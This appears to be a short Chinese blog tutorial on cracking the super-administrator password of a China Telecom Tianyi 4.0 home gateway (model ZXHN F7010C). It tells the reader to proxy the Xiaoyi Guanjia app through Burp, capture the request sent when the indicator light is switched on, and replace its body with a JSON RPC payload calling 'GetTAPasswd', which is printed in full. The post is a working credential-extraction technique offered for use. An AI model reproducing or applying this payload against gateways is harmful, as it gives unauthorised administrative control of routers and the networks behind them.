之前讲过天翼3.0的超级管理员密码的破解,利用文件越权漏洞便可以破解,但是4.0的网关该漏洞已经修复。今天来看看如何破解吧!

环境

  • 网关型号 ZXHN F7010C
  • Burp
  • 小翼管家APP

实现原理

登录小翼管家APP,先将指示灯关闭。设置代理后,打开指示灯按钮,然后利用burp抓包。修改包数据即可!

设置代理


打开APP后,点击打开指示灯按钮并抓包。

修改包内容如下:

{
  "Params": [],
  "MethodName": "GetTAPasswd",
  "RPCMethod": "CallMethod",
  "ObjectPath": "/com/ctc/igd1/Telecom/System",
  "InterfaceName": "com.ctc.igd1.SysCmd",
  "ServiceName": "com.ctc.igd1"
}

视频演示

版权属于:逍遥子大表哥

本文链接:https://blog.bbskali.cn/3644.html

按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。

Kali黑客笔记一键关注
Last modification:August 22, 2022
© Allow specification reprint
正在沿街乞讨中……